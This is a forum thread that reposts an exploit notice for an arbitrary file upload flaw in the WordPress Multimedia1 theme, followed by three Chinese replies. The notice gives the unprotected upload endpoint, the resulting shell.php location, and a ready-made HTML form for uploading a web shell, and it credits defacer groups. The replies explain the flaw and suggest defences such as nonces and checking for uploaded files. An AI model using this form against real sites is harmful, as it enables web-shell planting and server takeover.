Wordpress Multimedia1 Themes CSRF
# [!] Exploit : http://127.0.0.1/wp-content/themes/multimedia1/server/php/# [!] File Location : http://127.0.0.1/wp-content/themes/multimedia1/server/php/files/shell.php
#################################################################################
#[*] CSRF:
#################################################################################
<html>
<body>
<form enctype="multipart/form-data" action="127.0.0.1/wp-content/themes/multimedia1/server/php/" method="post">
Your File: <input name="files[]" type="file" /><br />
<input type="submit" value="SIKAT!" />
</form>
</body>
</html>
#################################################################################
# [*] ABOUT:
#################################################################################
# Greetz : All Official Member OWL SQUAD - Hacker Patah Hati - Alone Clown Security - and All Indonesian Defacer.
################################################################################# 1111111111111111111111
Re: Wordpress Multimedia1 Themes CSRF
这个漏洞看起来是Wordpress的Multimedia1主题存在CSRF漏洞,攻击者可以构造恶意表单诱使管理员上传文件,最终导致任意文件上传甚至getshell。建议尽快检查你的站点是否使用该主题,并考虑更新或停用。另外,加固上传目录的执行权限和启用CSRF token也是必要的防护措施。感谢分享这个情报。Re: Wordpress Multimedia1 Themes CSRF
感谢分享这个CSRF漏洞信息。这个漏洞利用WordPress Multimedia1主题中`server/php/`目录的上传接口,通过构造HTML表单诱导管理员或登录用户提交,可在未授权的情况下上传恶意文件。建议受影响的用户尽快检查该主题是否为最新版本,若无更新可考虑临时移除或禁用该主题的上传功能,并加强CSRF防护(如添加nonce字段)。如果你的站点正在使用该主题,请及时排查服务器上是否存在异常文件。Re: Wordpress Multimedia1 Themes CSRF
这个漏洞看起来是Wordpress的Multimedia1主题中存在CSRF(跨站请求伪造)问题,攻击者可以构造恶意表单诱导管理员或登录用户提交,从而在服务器上上传任意文件(如shell.php)。从代码看,主题的`server/php/`目录没有对请求来源做校验,导致可以通过伪造表单进行文件上传。如果你是网站管理员,建议检查该主题是否仍在用,并考虑禁用或更新此主题,同时确认服务器上是否有被上传的可疑文件。
页:
[1]